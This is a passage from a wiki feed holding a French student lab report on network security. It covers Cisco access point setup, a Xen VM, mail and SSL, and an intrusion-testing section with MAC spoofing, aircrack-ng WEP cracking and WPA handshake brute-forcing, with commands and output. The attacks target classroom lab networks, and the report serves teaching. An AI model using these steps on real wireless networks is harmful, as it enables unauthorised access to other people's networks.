&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du point d’accès Cisco &amp;lt;/h3&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du Wifi sur l'eeePC&amp;lt;/h3&amp;gt;&lt;br /&gt;
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.&lt;br /&gt;
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. &lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Installation des systèmes d'exploitation &amp;lt;/h1&amp;gt;&lt;br /&gt;
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.&lt;br /&gt;
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.&lt;br /&gt;
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. &lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h2&amp;gt;Installation de la machine virtuel&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie concerne l’installation du machine virtuel Xen.&lt;br /&gt;
Nous installons Xen car celui-ci permet de faire de la  paravirtualisation. &lt;br /&gt;
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps &lt;br /&gt;
&lt;br /&gt;
Les étapes a suivre pour l’installation de Xen sur cordouan:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
connexion à notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration de Xen:&lt;br /&gt;
- On autorise les connexion ssh en root&lt;br /&gt;
- On retire Network Manger pour configurer la connexion au réseau manuellement &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage systemd &lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@chien:~# apt-get install vim strace tcpdump &lt;br /&gt;
root@chien:~# apt-get install host&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Services Internet &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Serveur DNS&amp;lt;/h2&amp;gt;&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cat /etc/bind/named.conf.options &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
host -t ni love-in-the-world.space&lt;br /&gt;
host -t any love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
cat db.love-in-the-world &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
cat /var/log/daemon.log&lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
service bind9 stop&lt;br /&gt;
service bind9 start&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Recuperation du certificat SSL&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur &lt;br /&gt;
&lt;br /&gt;
Instalation et Configuration de la boite Mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  apt-get install postfix bsd-mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
configuration de la boite mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #nano /etc/aliases&lt;br /&gt;
   postmaster:    root&lt;br /&gt;
   admin: root&lt;br /&gt;
 &lt;br /&gt;
 #newaliases&lt;br /&gt;
 #mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail &lt;br /&gt;
E-mail: admin@love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
Verfification:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#mailx&lt;br /&gt;
From Maxime.Strunc@polytech-lille.net  Fri Nov 20 13:22:24 2015&lt;br /&gt;
Return-Path: &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Original-To: admin@love-in-the-world.space&lt;br /&gt;
Delivered-To: admin@love-in-the-world.space&lt;br /&gt;
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])&lt;br /&gt;
	by chien (Postfix) with ESMTP id E7DA93421F&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 13:22:24 +0100 (CET)&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])&lt;br /&gt;
	(Authenticated sender: mstrunc)&lt;br /&gt;
	by peronne.escaut.net (Postfix) with ESMTPA id 305081C38&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 11:33:52 +0100 (CET)&lt;br /&gt;
MIME-Version: 1.0&lt;br /&gt;
Content-Type: text/plain; charset=UTF-8;&lt;br /&gt;
 format=flowed&lt;br /&gt;
Content-Transfer-Encoding: 7bit&lt;br /&gt;
Date: Fri, 20 Nov 2015 11:33:52 +0100&lt;br /&gt;
From: Maxime Strunc &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
To: &amp;lt;admin@love-in-the-world.space&amp;gt;&lt;br /&gt;
Subject: Hello&lt;br /&gt;
Message-ID: &amp;lt;478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Sender: Maxime.Strunc@polytech-lille.net&lt;br /&gt;
User-Agent: Roundcube Webmail/0.7.2&lt;br /&gt;
Status: RO&lt;br /&gt;
&lt;br /&gt;
Hey it's working&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
- Recupération du Certificat:&lt;br /&gt;
Je vais sur Gandi.net&lt;br /&gt;
&lt;br /&gt;
génération de la CSR&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@chien:~#   openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr&lt;br /&gt;
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : &lt;br /&gt;
admin@love-in-the-world.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres avoir renseigner tout les champs, &lt;br /&gt;
j'obtient la CSR: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
       ... texte crypter...&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Je la copie dans l'emplacement voulue sur gandi.net&lt;br /&gt;
&lt;br /&gt;
Gandi m'envoi un mail a l'adresse informée &amp;quot;admin@love-in-the-world.space&amp;quot;&lt;br /&gt;
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.&lt;br /&gt;
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt&lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h1&amp;gt;Test d'intrusion &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci.  &lt;br /&gt;
&lt;br /&gt;
Changement d'adresse MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On change la cles par: 0000000000&lt;br /&gt;
et le SSID : T1&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key 0000000000&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Préparation aux cassage de clés&amp;lt;/h2&amp;gt;&lt;br /&gt;
- Instalation aircrack-ng&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install aircrack-ng firmware ralink&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
- Instalation du port usb-Wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install firmware ralink&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WEP &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je scan le reseaux Wifi: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J’identifie le ssid de cracotte06 et je met les donnée  dans un fichier nommé fcracotte06&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w&lt;br /&gt;
fcracotte06&lt;br /&gt;
&lt;br /&gt;
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La capture a donc commencé &lt;br /&gt;
&lt;br /&gt;
Dans un autre terminal:&lt;br /&gt;
Je vais analyser mon fichier de capture pour casser la cles.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ls&lt;br /&gt;
aircrack-ng fcracotte06-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres quelque minutes on obtient la cles &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                 [00:06:58] Tested 965565 keys (got 60459 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) &lt;br /&gt;
    1    0/  1   AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) &lt;br /&gt;
    2    0/  1   AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) &lt;br /&gt;
    3    4/  5   AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) &lt;br /&gt;
    4    0/  1   AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) &lt;br /&gt;
    5    0/  1   AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) &lt;br /&gt;
    6    0/  1   AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) &lt;br /&gt;
    7    0/  1   AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) &lt;br /&gt;
    8    0/  1   AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) &lt;br /&gt;
    9    0/  3   D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) &lt;br /&gt;
   10    0/  1   5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) &lt;br /&gt;
   11   13/  1   48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) &lt;br /&gt;
   12    0/  1   BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WPA&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie consiste a casser une clés WPA par force brute.&lt;br /&gt;
Je m'interesse plus particulierement a caracotte06 comme précédament.&lt;br /&gt;
 &lt;br /&gt;
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake.   &lt;br /&gt;
&lt;br /&gt;
Recuperation du Handshake: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06&lt;br /&gt;
&lt;br /&gt;
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
creation d'un dictionaire :&lt;br /&gt;
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.&lt;br /&gt;
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
int main ()&lt;br /&gt;
{&lt;br /&gt;
int val=0;&lt;br /&gt;
for(val=0;val&amp;lt;99999999 ;val++)&lt;br /&gt;
{printf(&amp;quot;%08d\n&amp;quot;,val); }&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Compilation :&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
gcc -Wall Dictionnaire.c -o Dictionnaire&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création :&lt;br /&gt;
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
./Dictionnaire &amp;gt; Dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Cassage de la cles: &lt;br /&gt;
après avoir récuperer le Handshake du Wifi carotte06&lt;br /&gt;
Je vais casser la clés en utilisant mon dictionnaire &amp;quot;Dico&amp;quot; le fichier &amp;quot;wpacracotte06-02.cap&amp;quot;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [02:00:57] 12399908 keys tested (1782.72 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399906 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 4B 0E E0 87 93 06 14 C0 E2 64 55 76 95 9A 30 6B &lt;br /&gt;
                       75 7C 8F CC B4 F8 2B 0D 78 3A 57 04 79 C2 F9 72 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 63 0F 9B D4 8B 09 C9 2C D5 E2 56 3D C7 21 AC 9E &lt;br /&gt;
                       94 5C E6 F7 19 FB EA 52 3F 02 C4 10 72 4F B8 7E &lt;br /&gt;
                       F1 92 CC 2C 02 E1 F7 47 C1 1D F2 FD CE EF F5 5E &lt;br /&gt;
                       22 24 87 42 46 4F D6 38 DF D4 CC 6D 61 4E 1D 7E &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : A3 D3 FD F5 09 AC B9 96 F5 0E 93 0A 3C 63 36 CD &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
mettre serveur messagerie &lt;br /&gt;
demander certificat&lt;br /&gt;
&lt;br /&gt;
securisation wifi &lt;br /&gt;
WPA-EAP&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23132</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23132"/>
				<updated>2015-11-22T18:11:57Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Ce mini projet a pour but de nous donner des notion en sécurité informatique.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Configuration du point d’accès&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Restriction par adresse MAC &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
